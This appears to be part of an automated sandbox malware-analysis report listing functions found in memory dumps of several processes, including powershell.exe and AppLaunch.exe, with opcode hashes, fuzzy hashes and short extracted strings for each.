Opcode ID: 5364017ae874740034876cfb5c70a562729524e0c0a925a6704647bf1e78b647
Instruction ID: 1e801ead7eb616b8a4e4ea26303e50d6dda3c3b3e165309845529e8f7c1d6283
Opcode Fuzzy Hash: 5364017ae874740034876cfb5c70a562729524e0c0a925a6704647bf1e78b647
Instruction Fuzzy Hash: 76D01730A0120CEF8B40EFA8E90095DFBB9EF44290B2045A89908D7210EA31AF009F81

Uniqueness

Uniqueness Score: -1.00%

Function 030C0848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1722517267.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30c0000_Vulvvmkewji.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09954505ec427452cf77b3f695b4d7db5633767eab1a5fa2490e096a85c4a134
Instruction ID: 88273df132add06ec8cc503d09de164319ceed9396802a42a8b78e062f237736
Opcode Fuzzy Hash: 09954505ec427452cf77b3f695b4d7db5633767eab1a5fa2490e096a85c4a134
Instruction Fuzzy Hash: F4D01730A0020CEF8B40EFA8E90455EB7B9EB49380B5045A89908D3210EA316F009B81

Uniqueness

Uniqueness Score: -1.00%

Function 030C7038 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1722517267.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30c0000_Vulvvmkewji.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction ID: 636a0867088dbb6db8f849425f7b3bb73adf18c868c7aef25dc7f8a57c478c69
Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction Fuzzy Hash: EFD09272D00139EB8B10AFE99C094EFFF79EF09A50B418126E929AB101D3B55A21DFD5

Uniqueness

Uniqueness Score: -1.00%

Function 030C26B0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1722517267.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30c0000_Vulvvmkewji.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b19a1ea1bc7e3705c8096b34c77d0699764ebdc75c686d300cf9b46084932bda
Instruction ID: 40f7eca95fdff178636494b3bf3324ab73d128fb542c1fec3b78492522b48171
Opcode Fuzzy Hash: b19a1ea1bc7e3705c8096b34c77d0699764ebdc75c686d300cf9b46084932bda
Instruction Fuzzy Hash: C2B092313A520C0AEAE0A7B9B844B2A76CC8B40698F4408A5B90CC2900E586E4702160

Uniqueness

Uniqueness Score: -1.00%

Function 030C2522 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1722517267.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30c0000_Vulvvmkewji.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45a61f5a78e9a7d946a74e837ccc459cb5469488989c69b4968c531a1523b77a
Instruction ID: 23850104a9f4d94afa12f47e516eb8f70daed6e9878fbb745374d4c7e48f5a74
Opcode Fuzzy Hash: 45a61f5a78e9a7d946a74e837ccc459cb5469488989c69b4968c531a1523b77a
Instruction Fuzzy Hash: 0DC012219482818FCB4287609426B80BBB0AF06241F880180C9448B642C6241820CB22

Uniqueness

Uniqueness Score: -1.00%

Function 030C26AA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1722517267.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30c0000_Vulvvmkewji.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdbf602b36cdcb65f0c976ec9bb744f724cd69926f97cffc6b3471e2e1e142c3
Instruction ID: 37568cd59f17d9121bc8a2d70a05c448029ec80e101c351b72bfd64264588b54
Opcode Fuzzy Hash: fdbf602b36cdcb65f0c976ec9bb744f724cd69926f97cffc6b3471e2e1e142c3
Instruction Fuzzy Hash: B7B092327510188AAE919AA4EA44559769E9A4118534A0999DC0DE3920E22195205620

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7540, Parent PID: 7336COMMON

Executed Functions

Function 00007FFD9BAC0819 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2327052840.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1db800796da7ee6252061a36310a85e5d39bddfc62975608aa7ab49b3becc62
Instruction ID: d0443bf02ff34a35e4014c3ad3c03a2d66dfe38e3c3ee23bfa90e0781044dc15
Opcode Fuzzy Hash: a1db800796da7ee6252061a36310a85e5d39bddfc62975608aa7ab49b3becc62
Instruction Fuzzy Hash: 3B513832B1EA8A0FFBB9A76C54712B937D1EF81610B0900BED55DC31E3DE19A8018385

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC08C6 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2327052840.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c2d52dc2a2f94806af9c010950b8686fa9d4c7c48896ff7c65c2820de97d442
Instruction ID: 3cd4e26829c7b81b379ac4f4b6d799dfe9a059325f401cf3c1ead23d39dff21b
Opcode Fuzzy Hash: 0c2d52dc2a2f94806af9c010950b8686fa9d4c7c48896ff7c65c2820de97d442
Instruction Fuzzy Hash: EE11E132B1FA4E4FFBB9A7A854B12BD76D1EF41650B5A00BED05DC35E3DD59A8008344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B9F3605 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2325985422.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b9f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
Instruction ID: cf94e3670947f52508bce6d2bc69cbae6ff05304e108dbff1f3a85f01369c937
Opcode Fuzzy Hash: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
Instruction Fuzzy Hash: 4801677121CB0C4FD748EF4CE451AA9B7E0FB95364F10056DE58AC36A5D736E881CB45

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AppLaunch.exePID: 7608, Parent PID: 7280COMMON

Executed Functions

Function 06775CF0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V3j, xrefs: 06775FA7

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: \V3j
API String ID: 0-2443366514
Opcode ID: 3d264983a0987e06e6cc03df7cbf18484292ff97ee54df4766b78e7e4dad8c61
Instruction ID: 6eacf890b934a38ab43baf086c82ad68fbd3bc5aedfe8a936648680301c8b223
Opcode Fuzzy Hash: 3d264983a0987e06e6cc03df7cbf18484292ff97ee54df4766b78e7e4dad8c61
Instruction Fuzzy Hash: 36B14070E10209CFEF54CFA9C9957AEBBF2AF88314F148529E419AB254EB749845CF81

Uniqueness

Uniqueness Score: -1.00%

Function 067765C0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c8a1903bbe9a893e4e951bf2e254844c6b7853b461a248bf78e3b6199eeb10f
Instruction ID: b23eb474992628fd5974cd3fc663fa641f57dd349071a976e6e04fe6d30dcd02
Opcode Fuzzy Hash: 0c8a1903bbe9a893e4e951bf2e254844c6b7853b461a248bf78e3b6199eeb10f
Instruction Fuzzy Hash: 0EB16D70E00609CFDF50CFA9D8857ADBBF2BF89354F148529D819EB298EB749845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06771727 Relevance: 5.4, Strings: 4, Instructions: 442COMMON

Download Yara Rule

Strings

xbq, xrefs: 06771D76
a^q, xrefs: 06771CDF
,, xrefs: 06771870
a^q, xrefs: 06771D3C

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: a^q$ a^q$,$xbq
API String ID: 0-2180861429
Opcode ID: 537004c928942e452be5663485a1155c32ed8e87126b690471d847417e60af23
Instruction ID: ef72f39aea38f00e9d1b45f081b4088fa64666c202e5df8d7e8c2260bfd9f896
Opcode Fuzzy Hash: 537004c928942e452be5663485a1155c32ed8e87126b690471d847417e60af23
Instruction Fuzzy Hash: 67028B70B002009FDB14DF68D884B6EBBE2BF88314F248969E4159B3A5DF74DD86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06771962 Relevance: 3.9, Strings: 3, Instructions: 183COMMON

Download Yara Rule

Strings

xbq, xrefs: 06771D76
a^q, xrefs: 06771CDF
a^q, xrefs: 06771D3C

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: a^q$ a^q$xbq
API String ID: 0-2081302502
Opcode ID: 30871550e5e09f0486bc46b3247879bd21b456ea50d62247681e2fe888055528
Instruction ID: f1b35c9e5cfbbd539a630cdb1b311fe7fd431dd480540dd074a3089be6595d83
Opcode Fuzzy Hash: 30871550e5e09f0486bc46b3247879bd21b456ea50d62247681e2fe888055528
Instruction Fuzzy Hash: C0615A706002009FDB54DF28E844B6A7BE2EB88314F148968E505DF3A5DBB5ED468BA5

Uniqueness

Uniqueness Score: -1.00%

Function 06779EE0 Relevance: 2.7, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

+, xrefs: 0677A0FE
xbq, xrefs: 0677A226

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: xbq$+
API String ID: 0-3688029685
Opcode ID: c4516b070bbe3a02590a08d79c65235d346b2ab7cdd9f85d0ad4a80a28f90ef7
Instruction ID: 7fea3fc5c489032baeedba9a0b4fba419f8d1751cc8f35d36d929515efb0f1ce
Opcode Fuzzy Hash: c4516b070bbe3a02590a08d79c65235d346b2ab7cdd9f85d0ad4a80a28f90ef7
Instruction Fuzzy Hash: 36916A70901300CFEB64CF29E9447293BA1B7E5714F048929D998DB7A0D7759A46CFF2

Uniqueness

Uniqueness Score: -1.00%

Function 06770EB8 Relevance: 2.7, Strings: 2, Instructions: 161COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06770EED
(bq, xrefs: 06771192

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: (bq$Te^q
API String ID: 0-2856382362
Opcode ID: f7298b653d19b51405439ba1c2dc9af7ce3678bb979c82379974ab4bda1458f0
Instruction ID: 307019f7c03edb6e34a3132bb44b606970d17a49f53e72ee3bcfeebafdbe33e1
Opcode Fuzzy Hash: f7298b653d19b51405439ba1c2dc9af7ce3678bb979c82379974ab4bda1458f0
Instruction Fuzzy Hash: AF518B30B001149FCB44DF6DD458A6EBBF6EF89710F2581A9E801EB3A6CA75DD01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06770D20 Relevance: 2.6, Strings: 2, Instructions: 133COMMON

Download Yara Rule

Strings

dLdq, xrefs: 06770D5B
Hbq, xrefs: 06770E40

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: Hbq$dLdq
API String ID: 0-411705877
Opcode ID: 78f6df44785658ae663316ac400d96a2eff27b23915193edff9308a6747f56fe
Instruction ID: 7ab93d1a66f3ab251d500b6ac8f77f3e80c0ce7eb84c5f9564b315db9a8452b8
Opcode Fuzzy Hash: 78f6df44785658ae663316ac400d96a2eff27b23915193edff9308a6747f56fe
Instruction Fuzzy Hash: 0B41EF70B042089FDB159F68D454AAEBFF6EF89300F1484AAE405DB3A2CA75DD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06779278 Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

$^q, xrefs: 067792B7
$^q, xrefs: 067792AD

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: be72d7bfa7652e7849702d662046166a4f69125b22a788f8b211e248dd768543
Instruction ID: 7ab87382f6618f755af9bf652c218d0316fb39d5a6c2130ac19f606564f281f1
Opcode Fuzzy Hash: be72d7bfa7652e7849702d662046166a4f69125b22a788f8b211e248dd768543
Instruction Fuzzy Hash: BC414170B09545CFCBAC6F69D48842DBBB6BB84701728C954F11A8B394CB329C13CF86

Uniqueness

Uniqueness Score: -1.00%

Function 06775CE4 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

\V3j, xrefs: 06775FA7

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: \V3j
API String ID: 0-2443366514
Opcode ID: ba009ee0621dda99df3b9b300b8af8f382fc152a5ee5889a400ec90d5611e3c1
Instruction ID: 4522406e86fe370e26916b2713a926ced750d883f76665accb723bbdf3e8b071
Opcode Fuzzy Hash: ba009ee0621dda99df3b9b300b8af8f382fc152a5ee5889a400ec90d5611e3c1
Instruction Fuzzy Hash: 6BB14E70E10209CFEF94CFA9C9857AEBBF2BF48314F148529E419AB254EB749845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06772DA8 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

p @, xrefs: 06772DD8

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: p @
API String ID: 0-1223218288
Opcode ID: c53af14b5384621b0c6ca9118fe3746c17a5554dfff683b5da7838d5e25b3626
Instruction ID: 2f453d4dd269654fbb98a0cc64184433271f47544f9fa8126b88ed92137b1294
Opcode Fuzzy Hash: c53af14b5384621b0c6ca9118fe3746c17a5554dfff683b5da7838d5e25b3626
Instruction Fuzzy Hash: BF91AD31A002099FCB15DF78C5845AEFBB2FF85310F1585A9D429AB356DB70ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06779BB8 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06779C56

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 7d8c85672738aef869a70c7155e3429c0dba51ca7776f298a6c1f5c884e5cded
Instruction ID: aa7837ec460031533916792b2a55c3e358747e04f3a6c1f2ff2d8fabda2a70ec
Opcode Fuzzy Hash: 7d8c85672738aef869a70c7155e3429c0dba51ca7776f298a6c1f5c884e5cded
Instruction Fuzzy Hash: E8516B70A40204DFEB54DB69C959FA9BBF2AF88715F208159E612DB3F1CB75AC40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06779261 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

$^q, xrefs: 067792AD

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 750b4bace5b86f7cb4a8f2609352b337be0cbd59bf4a44d044ff181ac7f97307
Instruction ID: a502113c0217668437e64d12e3107ce3cc2246b4cb966ffccf7c2e985fcc815a
Opcode Fuzzy Hash: 750b4bace5b86f7cb4a8f2609352b337be0cbd59bf4a44d044ff181ac7f97307
Instruction Fuzzy Hash: 69418070A09540CFCBA96F69C49843DBB76BF85701728C995E14ACB395CB329C23CF82

Uniqueness

Uniqueness Score: -1.00%

Function 06771339 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

LR^q, xrefs: 0677138B

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 51a9da0937f7a33ce25d5daccd768afce9a6d27453e05bdc9bbd944167d2befd
Instruction ID: 1720c4da7c2690297a8b440b27f693cf3db73c48748a488def591a9986f04869
Opcode Fuzzy Hash: 51a9da0937f7a33ce25d5daccd768afce9a6d27453e05bdc9bbd944167d2befd
Instruction Fuzzy Hash: 3E31CD30F002068FDB44AB78855197EBBF6BFC9214B5840A9E409DB3A5EE309D02C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 06770D10 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

dLdq, xrefs: 06770D5B

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: dLdq
API String ID: 0-3390252261
Opcode ID: c43ae28b2c66a8e039f0b5432806a299195f2002b3371b2bcda76ef1759e0e01
Instruction ID: 47982193761daba9d6e39e4cb798409191295b7d1e05652e51b6cb36423125c9
Opcode Fuzzy Hash: c43ae28b2c66a8e039f0b5432806a299195f2002b3371b2bcda76ef1759e0e01
Instruction Fuzzy Hash: E4317E71A002049FDB15DF69D448BAEBFF2AF49300F1485A9E401EB3A1CB75ED44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06779190 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

Te^q, xrefs: 067791AA

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: b63341c26d9af694e1a362543857cb79ec968ee24e329b4dc454de00e31823f5
Instruction ID: 748829c667c980e3e4ebd4f90cf18b2d7a1d12af01def984fc28567c44f0a99d
Opcode Fuzzy Hash: b63341c26d9af694e1a362543857cb79ec968ee24e329b4dc454de00e31823f5
Instruction Fuzzy Hash: B5216031B101148FDB54EB68D958BAD7BF6AF88B10F208159E606DB3B1CF719C058B95

Uniqueness

Uniqueness Score: -1.00%

Function 06779697 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Te^q, xrefs: 067796C3

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 62339c631a50b28d0ec0e20a4c1d40e4facd3ffc6524d42227f587f4fc66814b
Instruction ID: cc57f008ce44f09022f2d68cbb5db0a1fd3f272e0e71d53d222a444d499f4a4b
Opcode Fuzzy Hash: 62339c631a50b28d0ec0e20a4c1d40e4facd3ffc6524d42227f587f4fc66814b
Instruction Fuzzy Hash: 53116030B502448FDB549F28C858B6DBFF6AF88710F14406AE502EB3B1CA759C01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 067796A8 Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

Te^q, xrefs: 067796C3

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: ff6aba25c8a549faf2ff0f24ac7173035ea292eaf28f29ceb04ae5e923f80017
Instruction ID: 4fcfc120494a74ba783d1816524cc316834c677cbf66b44ccb592741b9dd3c8e
Opcode Fuzzy Hash: ff6aba25c8a549faf2ff0f24ac7173035ea292eaf28f29ceb04ae5e923f80017
Instruction Fuzzy Hash: 95114230B50104DFDB549F69C898F6DBBF6AF88710F144059E502EB3B5CA759C41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0677A6A1 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

Te^q, xrefs: 0677A6CD

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 3f32abff742bc63486d6ecbc2f0e8d6960d1a0cdb82bbe3d49a971b24e1ebf06
Instruction ID: 34f310b69bbbd49757b4e37420a3399ed1c95fcd8d952fbc2206334cb1de114a
Opcode Fuzzy Hash: 3f32abff742bc63486d6ecbc2f0e8d6960d1a0cdb82bbe3d49a971b24e1ebf06
Instruction Fuzzy Hash: 64118230B102049FDB549B28D959BAE7BF6AF88710F2140A9E506EB3A1DF719D05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 06770E3F Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

Hbq, xrefs: 06770E40

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: ca628403dbd10b6b43a47ffb5121f14920cac8cc0b620cbf65b5c68fc93d0277
Instruction ID: 64af36786d7d169a39ad4dd3eacdee24d927034879236cc4b6b2204621c85711
Opcode Fuzzy Hash: ca628403dbd10b6b43a47ffb5121f14920cac8cc0b620cbf65b5c68fc93d0277
Instruction Fuzzy Hash: 67F0A4207092945FC3466B3D781482E7FEB9FDB25075908E6E549CB3A3DD288D0AC376

Uniqueness

Uniqueness Score: -1.00%

Function 06778CD8 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

LR^q, xrefs: 06778CED

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 3cda9d70901b200f03107fdd83c3701cd3110632e5c4760431082e0895f2b6d0
Instruction ID: 2df31502bd24db3bcc40ccf3ac95a7b85a3ea7120dd1ab7b0de49cf3902a463d
Opcode Fuzzy Hash: 3cda9d70901b200f03107fdd83c3701cd3110632e5c4760431082e0895f2b6d0
Instruction Fuzzy Hash: 97018671F001159FDF84EB68D9056FE77F5FB48610F1040A9E509DB250EB709E1187D6

Uniqueness

Uniqueness Score: -1.00%

Function 067765B6 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16fc38a47a56ce4fb0751a38d3c4a537fe1c36fccbde3b09d506c1278f2eb16
Instruction ID: 84165303fcdc92bbdaa146e58713d0ad88d52ada39939c56e9172f96bd7a10f9
Opcode Fuzzy Hash: c16fc38a47a56ce4fb0751a38d3c4a537fe1c36fccbde3b09d506c1278f2eb16
Instruction Fuzzy Hash: 04B16C70E00609CFDF90CFA9D8857ADBBF2BF49354F148129E819EB258EB749845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0677A2D8 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da43e58717a8ed341b1f29eff8037070981c42e8c9b8777ef9f9016099ed3e1d
Instruction ID: 19621ea8412affd3bc8342207457ed7ee59befc2c0279978fb5b0233ebb783fa
Opcode Fuzzy Hash: da43e58717a8ed341b1f29eff8037070981c42e8c9b8777ef9f9016099ed3e1d
Instruction Fuzzy Hash: 2AA19D70B002018FDF89EF38E85496DBBF2BF89304B108569D916DB355EB349D468B91

Uniqueness

Uniqueness Score: -1.00%

Function 06772A30 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ec2df5ff17cbc5b54d98b5916af41cd97d04a6a40dd02dda2697a59b523539f
Instruction ID: cfb9a8aeda37d048615bf8c9086dc64ee150c46a320282eba7b7ef95899298d4
Opcode Fuzzy Hash: 1ec2df5ff17cbc5b54d98b5916af41cd97d04a6a40dd02dda2697a59b523539f
Instruction Fuzzy Hash: 1AA18DB46013419FCB15EF34E84991EBFB2FF84714B208669D5068B366DB35D98ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 067737F8 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b7287dec95a1a76fe736f51c875fa86ca5db9f3b225f84967d7f193fbc121b
Instruction ID: 50381744527656ce2dfe9cfc7f44be5bae82f12f6c1c2ecc26be6c0bed5ab4c0
Opcode Fuzzy Hash: 28b7287dec95a1a76fe736f51c875fa86ca5db9f3b225f84967d7f193fbc121b
Instruction Fuzzy Hash: 0641CE30B042448FCB64EB79D8546AEBBE6EBC8324F14842DD15AD7351CF389946CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0677942A Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97bdf5ee2f4762f97f5e00c611f4803d705c806892e6229ab2efb5ba227c193e
